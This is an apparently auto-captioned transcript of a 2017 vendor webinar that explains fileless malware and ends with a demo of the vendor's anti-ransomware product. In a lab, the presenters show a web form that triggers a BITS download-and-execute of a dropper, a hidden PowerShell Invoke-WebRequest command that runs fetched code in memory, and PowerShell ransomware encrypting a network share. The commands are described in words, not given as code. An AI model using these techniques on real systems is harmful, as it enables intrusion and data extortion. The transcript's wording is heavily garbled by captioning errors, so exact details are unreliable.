Fileless Malware Demystified

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

hi I'm Greg Edwards with watch point and have Nathan Studebaker with me today and what we're what we're going to talk about is the rise of vilest malware so file s malware was first seen in 2014 by Kaspersky Labs actually within their own Network they they named it Dooku 2.0 and it was running on several of their servers and was exfiltrating data this was a 19 megabyte file as malware running on their server these were nation-state actors that were perpetrating this attack so it was the reason that you guys have are looking at this today is because the attackers have moved beyond beyond the nation-state attackers to profit motive attackers and and that's exactly what we're going to talk about today is how these profit motive attackers are utilizing vilest malware to attack commercial systems so Nate if you would please go ahead and start us off absolutely and thank you for the introduction great so the topics that I'm going to talk about today first we're going to start with a very basic intro into file Atlas malware I think it's important to just define exactly what that is and once we have that defined will take them close to look at the ins and outs of it see exactly how it works the pros and cons why you would want to use it and then towards the end of the demo we're gonna go through some some different scenarios so we have three different scenarios and we're actually going to start with a a traditional Fowler example so this enjoy involves a dropper where something's actually going to be downloaded and executed to our disk so it's going to land on our disk and execute it I know that that's not a file as example but we want to start with that to just help contrast and really set up you know the differences between a traditional dropper and the file list examples that we'll finish with so we have to file examples ones just some generic malware and the last one is some file is ransomware so what is fireless malware let's first define that well quite simply I think it can be defined as it's malware that doesn't write anything to the disk so I think the question that most people have when they first hear of it and they understand that it doesn't write anything to the disks is they ask well how does it execute that you know what's the sort of magic that's going on in and really the magic if you will is quite simple in a traditional example you're downloading the essentially the malicious payload the malicious code to your computer and you're executing it well the fireless example doesn't involve a downloader it simply leverages a shell that's capable of reading and executing the code all through memory and anything that a traditional file on disk malware can be used for well so can file this that are rather anything that traditional malware can be used for so can file this malware whether it be ransomware which we'll show today in the demo backdoors like a reverse shell exfilling data harvesting credentials you know the sky's the limit there so as Greg said file miss what file is my worst definitely on the rise now this these stats were taken from a cyber security company called carbon black and I've included the source to the blog article which you can find at the bottom it's actually on a dark rainy blog article but the point is last year there was a huge increase in the amount of file list malware that was being used last quarter of 2016 there was a 33% increase it was also used by leading ransomware campaign known as power power where so power where is a fireless ransomware campaign that uses PowerShell also in the news it was allegedly used in the DNC hack and as great already said - it's being found on servers and workstations so it's not just something that you have to worry about on a workstation perspective as far as attackers paratroop in over your defense's landing on your end points through malicious sites or the attackers are using the same attack vectors to attack servers and workstations they're just really carrying out the last phases of the attack with PowerShell or other file lists malware because it's so much more stealthy so one topic that I like to tell people about and keep in my mind when I'm talking about file is malware is the idea that random consumption is a hard drive so if you consider RAM is the newish hard drive and if you take an example such as knoppix or any other live CD you know that you can you can load an entire operating system and memory so the capacity is there for memory to hold a lot of information and and again the capacity has been there to do a lot of things even entire operating systems could be wrong and file as malware if I'm a hacker I wanted one advantage that it has for me is that it's taking a path of least resistance because there's never a file that gets written to the disk there's nothing for an antivirus engine to scan and that's how I'm able to be a lot more stealthy but still carry out devastating attacks so let's let's walk through a traditional malware infection so I have the steps here on the slide and let's just talk through each one so in a traditional example that involves downloading the file to the disk it's gonna start let's say with the user visiting a web page right they download a file the fog it's written to their disk and once it's on the disk that's where your antivirus has a chance to scan it and if it's seeing this malicious file before if it has a signature for it then it quarantines it right you're not allowed to run it but if it hasn't seen it before which is unfortunately often the case with with antivirus then it considers it safe and it allows you to actually treat the file and that means that then you haven't really infected yourself you downloaded it past your ABC and now you've infected yourself with with some malware but if we look at we contrast that with the fireless example we see that the the exploitation actually happens a lot quicker so let's walk through that the first step again is going to be my user visiting Paige the next thing that happens is I interact with the website and that could be something as simple as visiting a webpage maybe it's filling out a form or clicking a button we're actually gonna do both of those in our demo lab but once you've interacted with the site that's when really the first necessary component of file is malware kicks in and that's spawning a shell okay so once the shell is spawned now we have the ability to run malicious code and again nothing ever touches the disk there's nothing for antivirus to scan this is strictly done in memory right and they're leveraging shells if you're a Windows computer you've got many different attack vectors available to an attacker by default command prompt powershell w script even javascript is supported natively in Windows and those are all being leveraged to carry out these attacks and I actually have some PowerShell code that's kind of to the left of that ram stick which is a legitimate legitimate code is the same code we're going to use in the demonstration today it's the same type of formatted code that that we've actually seen I personally seen used in the wild and we'll explain more about those components the different switches and and what it all means so something else that's important to keep in mind is that it's not just malware that is using command shows legitimate programs use it to on this slide I have two screenshots I have one at the top and one at the bottom and upon initial glance you know it's not really apparent but one is malicious in which one wasn't and I'll just tell you that one was you know one was malicious and one wasn't if you look at them both they both involve it in an Explorer as our parent process and then they both have a child process that is a command show for our picture on the top we happen to use W script is our command shell whereas the picture on the bottom we're using command dot exe now if I was to stop there I don't think you'd be able to tell me and I certainly wouldn't be able to tell you which one was malicious or not but I happen to also be showing a child process a pawn dot exe it has our parent process of command out exe so that was something that was done in my test lab our developers don't give their files obvious names such as pond or ransomware dot exe and things of that nature but the point of showing this slide is that legitimate programs do this function in the same way that our mother's just programs do and that's what it makes you know part of what makes Incident Response so difficult so now let's talk about the pros and cons of file as malware and this is from an attackers perspective I'm a cyber criminal you know what's my motive for using these well one thing that I kind of already touched on was we have common shells I know that across any Microsoft Windows computer on the planet I'm gonna have PowerShell command prompt w script JavaScript all already there at my disposal and that's if they didn't even install anything else if you're using Linux you have bash you might have Python and the host of other types of show so I have common shadows I can leverage to attack a system right we talked about you know the fact that by definition it's very it's it's file list so that makes it very evasive because of all those factors it's harder to detect there's not many signatures being created for this stuff so I as a hacker I can reuse the same the same commands the same attacks over and over now the biggest con to it is that it's not persistent and what I mean by that is my payload my malicious codes being done all in memory so if that system is rebooted part of that means that the memory gets cleared and now my malware is gone so that is a big downside but I will also say that a lot of perpetrators are really blurring the lines of a file list malware they're still we're gonna not use a dropper they're still gonna use a command shell and run everything in memory the only part that they're blurring the lines of fireless is the actual persistence and instead of writing a file to disk where it's more certain to be to be scanned and caught by antivirus they're actually maintaining persistence the registry so though they'll they'll arm store their malicious code in the registry and put it in the startup location so when if the computer is rebooted the memory may be cleared but upon boot up it gets loaded back into memory and it stays there and they take advantage of the fact that not on a lot of companies not a lot of businesses are doing full registry scanning and or alerting so now that we've kind of covered what file lists malware is let's go into the demo environment so I can explain how things are set up so that once we're running in this these actual examples in our in our lab it'll it'll just help make sense of all of everything so let's first define a couple things and I'm making some general generalizations here but for the most part your typical environments can be put into two categories you have your less secure environment and that's where everyone has full admin rights to the computer there's no application whitelisting or anything that would prevent a user from installing any application they want and you're really only secure the other than firewalls and spam filters is antivirus that's the less secure setup the more secure setup involves revoking and or restricting the use of admin rights so that's where you're gonna say okay only certain people get admin rights standard most people get standard user rights right then you back that up with actual application whitelist and so not only have I removed admin rights I'm also restricting what applications can be installed and then I'm further backing that up with antivirus and we've actually chosen to use the more secure environment for our demo lab so the computer that I'll show you here in a moment it's a standard user I don't have admin rights I do have an application whitelisting set up via Microsoft software restriction policy and we're backing that all up all up with AV and the purpose of that is to just really demonstrate to you but despite these best practices I can still bypass all that security with files malware okay now the software restriction policy it's a disallowed policy I usually get a lot of questions on this or covered briefly disallowed means deny by default so unless you're in C program files or C Windows or in this case C support you can't run so just wanted to get that out of the way as well so the live demo we're gonna do it this is the last slide before we get into it or I guess X have one more but again we're going to start with a drive-by download so this is where I'm gonna visit a site I'm going to interact with it and this is going to be our traditional malware example we're gonna download a file to the disk and we're gonna show it it bypassing SRP essentially as if we didn't have white listing and we're also gonna show a white listing preventing it so it'll just help hopefully help set up and you can give some contrast to eith a traditional method that involves downloading and running a file to the disk to the last two of sonars that we run through which is our our file list malware the first version being PowerShell Mauer and then the last one V PowerShell ransomware so getting to our lab here again I've got a standard user I don't have admin rights I'm restricting what software applications can be installed via SRP and essentially what that means is when you take away admin rights from a computer pretty much the only place that a user can write write and execute files to is the AppData folder and you supplement that you know that that's the security hole so you supplement that with something like a software restriction policy so my users restrict to the app data and I'm further restricting what they can even run there now the actual attack the shell that we're gonna leverage again so keep in mind again all all file this file is malware including this one that uses a dropper they're leveraging a shell of some sort so we're gonna use command dot exe we're gonna then call on the background intelligent transfer service bits and bits is a service that's installed on any Windows operating system it's there by default it's running and it's going to download an executor dropper so I have the actual command which we'll go over just briefly and go into more to once we're in the lab but essentially again our shells gonna be command on THC we're gonna call on its admin to start a transfer job which goes out to the web HTTP colon slash slash demo server comm and it's gonna download this pawn dot exe and then if you notice I have the the C user's username I have that path I'm gonna have the ampersand star so what that what you can do with pits you can select to download and execute the file at the same time and that's actually what we're gonna do here in our lab so 1/8 before you move on here just wanted to make the point that this is the non vilest version of a malware example and that's where that pawn dot exe is the actual file that's getting downloaded and then executed so this is the non vilest version and that's what Nate's gonna show first yeah thanks thanks great okay so here's my screen over here so here is our our Windows or Windows 8 computer and what we're gonna do is first just demonstrate that that I that I am a restricted user I can't just install any old application not that I want so I'm gonna go ahead and go out here and well download will try to download Google Chrome all right so download Chrome I'm gonna go ahead and try to run it and then here's the via prompt from our software section policy saying you know your system administrators will lock this program and I think the thing to note here again is the app data folder so if I'm a a programmer with ethical intent I know that I may want my application to be installed by users who aren't if you don't have full admin rights and I also know then that if I'm gonna have them install it I need to run in half data that's a location that even non amendments have read and write access to software system policy allows you to secure that location and say nope I'm actually going to control what can or cannot be running so this is this is expect to be Haven it's really just a demonstrate that we have SRP and I'm eight and I'm a restricted user so the the website for today was what we're gonna use kind of for attack back there is this is this website right here this is our Jimmy pesto's pizza shop website now if you're a fan of Bob's Burgers like myself you'll get the reference but kind of the point of using this as an attack pictures to to demonstrate really just one of the ways that this type of things these type of attacks can be carried out this this website you know it looks like a real website it feels like a real website for one set the purposes it is you know I can look at the the menu I can browse it so let's go ahead and do our our first demonstration so this one's going to be where I'm essentially I'm gonna download and execute a file tour support fold in our support folder is not restricted by SRP and I wouldn't expect a hacker to guess that and just be able to code their their programmer to do that right away this is merely this first demonstration is to say let's say I didn't have a software restriction policy on my machine you know how how easy is it then for for malware like this to run so let's go ahead and demonstrate that I'm gonna go down to a forum so like I talked about before the first step is the you know user in this example I visited a page now I need to interact with it so I filled out some information on this forum and I'm gonna go ahead and send the message let him and I've got a party of 12 people on that and that we want some pizza so as soon as I do that we get this command shell here now I kind of chose bits because it opens up like this it provides the nice glimpse into the shell that is running and now I've got this other pop-up on my machine about my computer being locked this was actually a screenshot from the Windows XP virus an old virus that used to say you know you pay us $29.99 to to remove this virus so this is a common technique that's our malware uses to check further information and get to get money from from the victim from the target got this pop-up here as well but let's let's you know now that that happened pretty quickly so let's walk through it a little bit slower maybe so I'm gonna view the source of the webpage and kind of pull back the curtains a little bit more about what actually what actually happened so this script right here this this line of code is tied to that submit button so once that submit button is executed my browser is essentially telling the computer to open command command on ence start a a bits transfer job and go to this URL right where our malicious file is and then finish it off with a download and execute so within just a few lines of code we can turn a a form into a malicious dropper that not only downloads but also execute the file so that's just an important distinction to make we have a question that came in that says can't we just exclude command dot exe from running I'll let you answer that sure so yeah so that and that's actually something I will cover more kind of towards the end of the the demonstration but you can disable shell such as command dot exe but the problem with that is that you'll see in my next example I can just use a different show or a different attack vector so you can do that but I think as you'll see in our next demo as we talk about further along it shouldn't be the end I'll be huh solution right and and the other thing is that this first example is very simple kind of the methods that have really been being used for the last 10 years i and nate is showing a a compare and contrast against the old way and the new way so go ahead go ahead no problem yeah so so we submitted the form I showed you the the code so let's let's use one let's do the same thing but this time AppData so I do not expect this one to run this should be blocked by a software restriction policy so I'm gonna go ahead and just click this button because I wanted to see the menu here's our bits command prompt again here it is transferring a file okay and it closes we'll give it a second minimize that right but there's nothing either happening right there's no other activity and again that's because our in this case our suffers to chew policy did what it was supposed to do and didn't allow just any application to run so what it did still allow that file to be transferred over and that's important but then as Nate's showing right here that executable file that was transferred over what happens when it when you run it exactly so yeah so if we try to run the file we get that same prompt like we had before saying sorry the this directories are restricted contact your administrator so we expected all that to happen but just wanted to provide that first glimpse of you know file on the disk versus a file versus file list so let's go ahead and I think I have another slide to show you and then we'll move into the to the file list example so our five Eilis example again same computer so we're a standard user we are using software restriction policy and this time our shell of choice is going to be PowerShell now PowerShell is used by a lot of attackers because it's a very powerful scripting engine and it certainly blurs the lines of other scripting dangers got built-in command lint so you can automate a lot of tasks you can actually run dotnet and c-sharp code right within powershell so it's it's more than just a scripting language so if we look at this command and I just want to talk through the different components because this isn't it's gonna provide another important distinction between the traditional dropper file on disk versus the file less so okay again first starts with our show so our show about EHD we have two switches tear no profile and execution policy by pads so two security measures that are often implemented to to restrict the use of power show is by assigning profile so only certain users can run it and by using execution policy so only may be a sign sign scripts can be renowned so those are good switches to have to help lock it down but as I show you they can be turned off with two switches skull it's more security through obscurity than anything else the next switch is window style hidden so we're gonna see the initial the initial PowerShell command prompt open a typical malware developers gonna hide all of that but this window style hidden is at least going to hide the the running tests so once PowerShell opens then it's going to go to the background and the next thing it does is it doesn't invoke web requests so the invoked web request is a it's a built in powershell commandlets that you can use to to browse a web page you can browse the web page through command line you could have used anything else here dotnet functions a lot of things but kept it simple but the point is this invoke web request is going to browse our our page through command line so the pages are is our demo server so this is where the malicious content is hosted and the thing to keep in mind is our last example it was pong exe well this one's just pawn dot HTML again we're not using a dropper we're simply telling powershell to go to this web page okay then we're gonna filter the web page we just want we want just the content i don't want the header i don't want the the HTTP return status I just want the actual content of the page store that as a variable and then turn around and execute the contents of that page so whether the page is malicious code or just somebody's food blog power show is going to treat it the same and it's going to turn right around and execute so I think it may help to to to first start off and and let's look at the page in question so for this one I'm going to use a different page this is going to be the book this is our social media page this can we're going to use here it's a you know looks and feel like like like a typical page right I can you can see my groups my interest my events you know you can see my photos things like that you know like I said no reason not to trust this at all I can even I can even post to my wall here which I'll do a real quick world all right perfect now again the user has to interact with the site somehow alright and we're gonna do that today via this is a friend request but before we do that okay that doesn't necessarily have to be filling out a form and clicking a button or like like you're showing here we're gonna click that accept a button it could be any number of things it's and can be simply just visiting the page yeah yeah thank you for that distinction yes our ours is involved like clicking something but that type of drive-by attack that simply you just went to the URL is actually more probably more common for for them our developers but the the interesting thing here when we let's look at our source again so before I run this let's take a quick glimpse at what we're you know what's actually gonna run so again I'm gonna use PowerShell to invoke a web request to my site and then I'm going to turn around filter the contents of this fight and throw it right into an execute statement so if we we can actually go visit that page that is hosting our malicious code beforehand so let's do that so so this is this is this is all our shellcode so all that I really need to have happen again it's the user to interact with my web page and I'm already serving up malicious code via this page so once I click on this accept button to accept this friend request pahauwera show is gonna go out to this page and then execute all the code so let's go ahead and do that and actually before I do that I do want to get one thing running I want to open and process Explorer this is going to give us good good insight into it's showing the file in this aspect and again Nate doesn't have admin rights to this machine so that's why he's having to type in run run as administrator and then type in the admin username password to be able to actually run that okay so let's go ahead and we're gonna accept this friend request there's the powershell there's the shell alright and if we look at process explorer so here's our you know here's our malicious pop-up here let me the snow that we've been we've been pawned and i think what's interesting here is that we have we have our internet explorer process and then we have a child process of power show so this is really highlighting the fact that powershell was spawned from our from our nx4 and is being used to carry out the attack there's no dropper involved it's simply just doing all this in memory which is which is what we're seeing here this is is it a sent this is like looking in task manager and if i highlight our show we can actually see the command line again that was the powershell actually invoked so aside from the scene the process tree i can actually see the the commands there as well so i'll go ahead and close that you notice that PowerShell went away because I could closed it so that's you know a very crude example of of the phallus malware but on our file is ransomware example which I'm going to show you next the process there's not going to be anything for us to close you know it's gonna be what I call the silent killer so before I do that I want to just do something to show to everyone that this is indeed ransomware that that it will indeed encrypt file connected to my computer I have a Z Drive and on that Z Drive I have some data out here start with a new file so I have some some directories out here I have some actual data so this is all just going to be used we're more so used by the ransomware the ramps and where's is gonna go out to this drive it's going to start encrypting the data so I'll go ahead and create a file here and kind of show you the before and after so I'll call it a file and do mine my unencrypted text okay so this will be a nice before and after because once we run the ransomware again it's gonna be the silent killer it's gonna run it in the background and we'll come back and look at this file and see see if it's actually actually encrypted or or not and maybe for you before you actually start that we showed that code Oh yep thanks for yes absolutely so this code is a little more involved this is actually all of these are homegrown malware that Nate has created and I'll let you explain Nate what we're looking at here sure so once again you know I know that I'm going to be able to spawn a show and all I need to do is serve up the malicious code somewhere and this is the powershell ransomware that that greg said that that i developed in-house so this is actual ransomware we actually created this as a free tool that we that we give away on our website it's called the powershell encrypt or decrypt err and what it allows you to do is test your own defenses that's the perp this behind creating you can run actual ransomware that's going to encrypt files but with the added benefit of being able to decrypt the files afterwards so you know again we built it as a way to test your defense there's really no better way to know if your defenses can stop ransomware than to have actual ransomware so this is kind of pretty much the same thing but without without all of the fallout of not being able to get your data back and and you can see right online what is it the fifth line there what which types of files it's gonna go out and encrypt so you thing you know go attack these specific kind of files most ransomware actually will attack about 20 you know 25 to 30 different types of files so I just wanted to point that out that it's going to go attack those specific kind of files yeah exactly and this one you know was coated with some specific behavior my Docs it actually also attacks the network drive first and the reason behind that is that that's that's more the the way that that ransomware is going they figured out that they can inflict the most damage by by attacking a file server and coming back to the workstation last but but anyways this uses 200 256 bit AES encryption so it's a very very secure encryption algorithm and it's all said and done I think it's just under like 200 lines of code so it's not not a whole lot that you need to do actually have to to create ransomware and again once I run this once I once I so are the way we're serving this up is student through the decline button so what's gonna happen is once I decline the request we're gonna have our partial process spawn and it's going to go out to this page and then download and execute the contents of the page so and again just to recap we have our our our file here that's unencrypted so we'll come back and take a look at that in just a moment just to show you that it is indeed encrypting data so without further ado go ahead and click on that there's power show right and you know no pop-ups no no warning sign that anything's happening PowerShell is running as a child processed like it should and if I come back to that file I'm sure it's already already encrypted and there it is this the encrypted text no no longer what we had before was something else that actually programmed ours to do is to not change file extensions because that's a dead giveaway to what's happening and a lot of malware has has at least stopped changing file extensions so they use random file extension but that's beside the point the point is is that this this is running it's encrypting the files on our network and again this is the silent killer this doesn't need to survive a reboot ransomware can it files now in the neighborhood of 200 gigs an hour so they don't need a lot of time they just need a regular business day and and they can play with you in a very compromising situation and the thing to I think the big thing there is that that didn't seem like much you know not not a lot happened in an actual attacker would even hide that you wouldn't even see that little pop-up blip I mean it was barely noticeable but the big thing is it's it's encrypting files out on the network right now and if this were one of your users that had you know accidentally clicked on this page then it's it's running on your network and it's and like Nate showed it's known and look to the network drives first so it's encrypting files out on the network right now and no one would know it yeah exactly so that's you know that's the big danger here with it yes so great did you want to talk about crypto stopper briefly yeah so if you were if you want to stop that yeah yeah process from running I'm just so you're not encrypting everything out there already then the next would basically do the same example but showing it with our product called crypto stopper that will stop the ransomware that is in action so like we were talking about that that that kind of ransomware like this really any ransomware once it's running then how do you know that I mean you typically don't know that until someone comes and says hey I can't access this file and then you realize whether that's 30 minutes or three days later that in you know terabytes and terabytes of data could be encrypted so subdued so go ahead and answer up the compressed hopper service on that server and let's show what happens when crypto stopper is running okay okay yeah so so crypto stopper like I said this is our anti-rattle we're product that we developed it's a deception based solution it doesn't use signatures or anything like that and it's used to to stop actively running ransomware in it does it very quickly it's really easy to set up I won't go into a lot of detail with it but really all you do is select your share select all the folders you want to protect and crypto stopper crypto software does the rest so let me just check one thing to make sure we're we're locked and loaded and for good services crypto Stoppard running yeah so if I come back to my computer now again I've got I've got my Z Drive this is where the remnants mover is gonna get a target first let's go ahead and run it again good check process Explorer see yep there it is again there's PowerShell running showed you already that it that it's encrypting data so what crypto Stoppers gonna do is it's gonna actually detect detect the ransomware and and know that it's coming from this computer and and here's actually the message from crypto stopper so this is a message that our software sends out to the infected host to patient zero if you will saying hey you know we've seen ransomware okteivia on this computer please sign out because we're gonna automatically shut down this computer here in a few minutes and if I go back to my Z Drive so I can see that PowerShell is still running and that's okay because I actually don't have access to my C Drive anymore so what crypto stopper is done it's actually identified this computer amongst all the other ones in the network and it's isolated it from the front from the server so here's the IP address our infected computer Oh Stoppers using this firewall rule to block that computer so that way everyone else can continue working but the infected host is isolated and is and is prevented from doing any any other further harm like I said cannot get access to that drive so just want to just wanted to show that so I have a couple more slides that I'd like to like to finish off with just to kind of recap everything that we've talked about so far so hopefully by now we know that file is malware well it really starts in RAM there's no dropper involved it's simply just using a shell to read and execute so something interesting here even though I demonstrated how the code can be hosted on webpages some attactive is are starting to now use DNS DNS records and they're doing that as a another stealthy way just another thing for you to have to worry about as far as your defenses go if you've ever set up like an SPF record it's a it's actually a DNS tht record and essentially they're taking the code similar to what I have in bold at the bottom of the slide putting it on the DNS record and then they're calling it with their show so again starts in RAM it leverages a show to read and execute the contents all in memory and then once that's happened that's when the malware infection begins alright so so the question that that everyone should be asking themselves is how do we defend against this I and we were showing just one kind of attack vector we're showing what what we're seeing attackers transition to you and that's infecting websites so there are 76 and a half million WordPress sites right now that's about 25% of all the websites in the world are hosted by WordPress which is not and I want to pick on WordPress I think it's a great platform but it's very vulnerable to these attackers taking over those sites and doing exactly what Nate here and hosting that malicious code on them so when you think about your users interacting with websites on a daily basis how do you stop that and we break that down into reactive systems and active systems Nate if you want to proceed ahead we're not gonna go into great detail on these but a reactive system is an incident of compromised tool so end point detection one of the slides that Nate showed is actually a system we use called carbon black and it allows you to read endpoint recording essentially and then compares that against incidents of compromise and the reason we call that reactive is because it has to happen in it it you take action after the fact so and then a sim sim tool would be another example of a reactive tool active tools would be DNS sinkholes of black holes and crypto stopper like we showed so crypto stopper on average will stop a host post infection so ransomware actively running on the network I will stop it in on average 17 seconds so so with that I know we've got a few questions that are posed out there so let's let's pull those up and and talk about those first is doesn't AV scan memory so so yes it does but it only scans memory on boot-up and then on a scheduled basis so and again attackers are going to they're gonna test these systems out before they ever release any code so they're they're going to make sure that it does execute in the next next question is similar vein would an anti exploit program stop this so the answers maybe but probably not and again the attackers are going to they're going to test it before they release it so they're going to know already that they're going to be able to bypass your your prevention measures and then we just have one one final question can you show the code running remotely again I did exactly catch that so if you would not back up and showed that actual code to that station sugar yeah you mean one side yeah so crypto stopper a good thing about it is a it will it will shut down the PC for you you know in addition to isolate you're pulling that up that brings up a good question of okay what happens if the user reboots in a viola example as long as they didn't create any persistence then it's flushed it out of memory so it's not going to run in a traditional file based attack that ransomware could run again and it with crypto stopper installed it's still going to be blocked unless the admin goes and allows that user back on the network because what it's doing is creating a firewall rule and I don't know if you already asked Peter sick of been on here yeah so what I think it was it was getting soaking so hung up because it was trying to map that drive again and I can't yeah so what this is demonstrating like Gregg said is that when you reboot the system even even if you reboot the computer it comes back online before you've had a chance to move that remove the threat crypto stoppers still blocking that I can't I can't access that that drive anymore but once you do get it cleaned up once you do have the system virus free crypto stopped or all you need to do to get that allow that computer to talk to the to the server again is to remove the IP address from the rule so within a couple clicks now I can go back to my workstation and I've got my drive again but yeah I guess to to follow up with that question let's go ahead and look at go back to our social media page and we'll look at that code one more time yes so this is yes it's the example of the file less so this is where it's executing PowerShell and I don't want to steal your thunder here Nate but executing PowerShell and not downloading a file but just exit code executing it so go ahead and name yeah exactly so you know more so it kind of treats the yes it's treating the webpage it doesn't care what the web page has hosted it's just treating whatever is on it as as code and and when when the web page is hosting malicious code it obviously then can be used used against you and that you know I know when I was first getting into this it was it was almost a letdown there's almost a plate and I thought that's all it is but I mean that's all it it you know it's that simple that that all I need is is a show something like power show and then from there I can invoke a web request to my web server right filter the contents of the page I'm just really getting the code and then turn around turn right around and invoke it as a script so PowerShell is a very powerful language but it's you know but it also can as I've shown here can be weaponized and I guess one other interesting point that I haven't talked about yet is the hard coding of this Pat so this is something that an attacker would do they know that C windows system32 windows powershell version one probably WC that is the path to the windows powershell on every single windows computer out there so they can hard code that that's a very easy thing to do and no and and yeah there's kind of kind of leveraging that too like I said read the contents of a page which happens to be listed here and why don't you show that again to and we'll finish up with Nate yeah so the ransomware again you know that's kind of what the page looks like you know it's something a user would you know not visit but that's that's not the point garbage okay so right all right well thank you everyone for joining us today we'll wrap up with that with a little bit of 220 lines of scary code so thank you everyone for joining us have a great day

Info

Channel: CryptoStopper

Views: 9,867

Rating: 4.9333334 out of 5

Keywords: malware, ransomware, fileless malware, fileless ransomware, WatchPoint, CryptoStopper

Id: atL1WmmMJJw

Channel Id: undefined

Length: 48min 41sec (2921 seconds)

Published: Thu Apr 06 2017